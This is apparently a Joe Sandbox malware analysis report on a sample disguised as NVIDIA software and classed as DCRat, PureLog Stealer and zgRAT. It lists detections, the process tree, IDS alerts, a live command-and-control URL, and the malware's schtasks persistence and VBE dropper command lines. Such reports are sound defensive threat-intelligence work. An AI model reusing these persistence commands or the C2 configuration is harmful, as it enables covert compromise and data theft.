Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NVIDIAShare.exe.bin.exe

Overview

General Information

Sample name:NVIDIAShare.exe.bin.exe
Analysis ID:1590022
MD5:c9feda13f449c852ee9b95967bdfd3de
SHA1:015bf16040a779d85521d5296b6ed27d1e761e70
SHA256:ea0dec7cb08637c829b8c4d08439524e9c1ad5a7116e6cfd8780b533809bff72
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • NVIDIAShare.exe.bin.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe" MD5: C9FEDA13F449C852EE9B95967BDFD3DE)
    • wscript.exe (PID: 5480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • NVIDIA Container.exe (PID: 1472 cmdline: "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
          • schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3356 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3220 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 768 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
  • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2520 cmdline: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
    • cmd.exe (PID: 6176 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 4092 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 5032 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
        • cmd.exe (PID: 2568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 5536 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • w32tm.exe (PID: 1196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
          • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2876 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
            • cmd.exe (PID: 6020 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 5528 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 5160 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                • cmd.exe (PID: 6352 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 7056 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 2964 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                    • cmd.exe (PID: 5036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 2672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • PING.EXE (PID: 5560 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                      • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                        • cmd.exe (PID: 1684 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 1964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 2788 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • w32tm.exe (PID: 1436 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                          • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                            • cmd.exe (PID: 4708 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                              • conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                              • chcp.com (PID: 356 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                              • w32tm.exe (PID: 4592 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                              • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 3292 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                                • cmd.exe (PID: 2656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                  • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                  • chcp.com (PID: 6628 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                  • PING.EXE (PID: 6044 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                                  • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
                                    • cmd.exe (PID: 2964 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                                      • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                        • Conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                                      • chcp.com (PID: 1732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                                      • w32tm.exe (PID: 1248 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                        • Conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • hBoBqOIwjXsCbkOMEKwZ.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)
  • cleanup
{"C2 url": "http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
SourceRuleDescriptionAuthorStrings
NVIDIAShare.exe.bin.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    NVIDIAShare.exe.bin.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              SourceRuleDescriptionAuthorStrings
              00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Process Memory Space: NVIDIA Container.exe PID: 1472JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 1 entries
                        SourceRuleDescriptionAuthorStrings
                        5.0.NVIDIA Container.exe.e70000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                          5.0.NVIDIA Container.exe.e70000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                            0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                              0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                  Click to see the 5 entries

                                  System Summary

                                  barindex
                                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe, ParentProcessId: 2788, ParentProcessName: NVIDIAShare.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , ProcessId: 5480, ProcessName: wscript.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe", ParentImage: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, ParentProcessId: 1472, ParentProcessName: NVIDIA Container.exe, ProcessCommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, ProcessId: 5856, ProcessName: schtasks.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe", ParentImage: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, ParentProcessId: 1472, ParentProcessName: NVIDIA Container.exe, ProcessCommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, ProcessId: 5856, ProcessName: schtasks.exe
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe, ParentProcessId: 2788, ParentProcessName: NVIDIAShare.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , ProcessId: 5480, ProcessName: wscript.exe
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-13T13:37:13.005589+010020480951A Network Trojan was detected192.168.2.549704104.21.64.180TCP
                                  2025-01-13T13:37:24.896291+010020480951A Network Trojan was detected192.168.2.549745104.21.64.180TCP
                                  2025-01-13T13:37:32.865040+010020480951A Network Trojan was detected192.168.2.549796104.21.64.180TCP
                                  2025-01-13T13:37:44.818204+010020480951A Network Trojan was detected192.168.2.549872104.21.64.180TCP
                                  2025-01-13T13:37:52.443231+010020480951A Network Trojan was detected192.168.2.549919104.21.64.180TCP
                                  2025-01-13T13:38:05.240142+010020480951A Network Trojan was detected192.168.2.549980104.21.64.180TCP
                                  2025-01-13T13:38:13.349540+010020480951A Network Trojan was detected192.168.2.549981104.21.64.180TCP
                                  2025-01-13T13:38:21.365330+010020480951A Network Trojan was detected192.168.2.549982104.21.64.180TCP
                                  2025-01-13T13:38:33.693350+010020480951A Network Trojan was detected192.168.2.549983104.21.64.180TCP
                                  2025-01-13T13:38:40.990270+010020480951A Network Trojan was detected192.168.2.549984104.21.64.180TCP
                                  2025-01-13T13:38:52.193443+010020480951A Network Trojan was detected192.168.2.549985104.21.64.180TCP
                                  2025-01-13T13:39:03.101484+010020480951A Network Trojan was detected192.168.2.549986104.21.64.180TCP
                                  2025-01-13T13:39:09.880948+010020480951A Network Trojan was detected192.168.2.549987104.21.64.180TCP
                                  2025-01-13T13:39:21.068494+010020480951A Network Trojan was detected192.168.2.549988104.21.64.180TCP
                                  2025-01-13T13:39:31.990406+010020480951A Network Trojan was detected192.168.2.549989104.21.64.180TCP
                                  2025-01-13T13:39:54.443563+010020480951A Network Trojan was detected192.168.2.549991104.21.64.180TCP
                                  2025-01-13T13:40:05.537339+010020480951A Network Trojan was detected192.168.2.549992104.21.64.180TCP
                                  2025-01-13T13:40:12.349847+010020480951A Network Trojan was detected192.168.2.549993104.21.64.180TCP
                                  2025-01-13T13:40:23.318637+010020480951A Network Trojan was detected192.168.2.549994104.21.64.180TCP
                                  2025-01-13T13:40:34.318680+010020480951A Network Trojan was detected192.168.2.549995104.21.64.180TCP
                                  2025-01-13T13:40:45.506195+010020480951A Network Trojan was detected192.168.2.549996104.21.64.180TCP
                                  2025-01-13T13:40:56.849991+010020480951A Network Trojan was detected192.168.2.549997104.21.64.180TCP
                                  2025-01-13T13:41:07.849998+010020480951A Network Trojan was detected192.168.2.549998104.21.64.180TCP

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: NVIDIAShare.exe.bin.exeAvira: detected
                                  Source: C:\Users\user\Desktop\IyVKJmYP.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\DnVLkBOS.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\AppData\Local\Temp\FuUFRpewDb.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\AOEnQqnj.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\user\Desktop\DSPMVDWa.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\AppData\Local\Temp\ij3ogloIkp.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Users\user\Desktop\CTevJfQr.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\JOqdsLLu.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\1QWUF8ga47.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\JfykNhTG.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                  Source: C:\Users\user\Desktop\JesvDTTS.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeReversingLabs: Detection: 65%
                                  Source: C:\Users\user\Desktop\AAjFTaDk.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\AOEnQqnj.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\AVNUZtIi.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\BlhnJSvN.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\CTevJfQr.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\DSPMVDWa.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\DaiMBcDs.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\DnVLkBOS.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\GwjbnDUU.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\HbFMikPW.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\IMSbQhuH.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\IyVKJmYP.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\JOqdsLLu.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\JesvDTTS.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\JfykNhTG.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\LxmktYfY.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\NBjcEgcI.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\OOMCloya.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\PszJebvu.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\ShoatPdx.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\TAxSAtpp.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\TMLKnwYz.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\TxJtcnQc.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\UCVIiXUm.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\VAeASPIF.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\XOysNJXm.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\XwgSVREI.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\chLhgIIs.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\cjQhkVuX.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\fjyPCrNn.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\gzqzblNZ.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\hxRHxlcT.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\oSRflUSV.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\pAbpDGmk.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\qiYwETGO.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\skLfaCLK.logReversingLabs: Detection: 37%
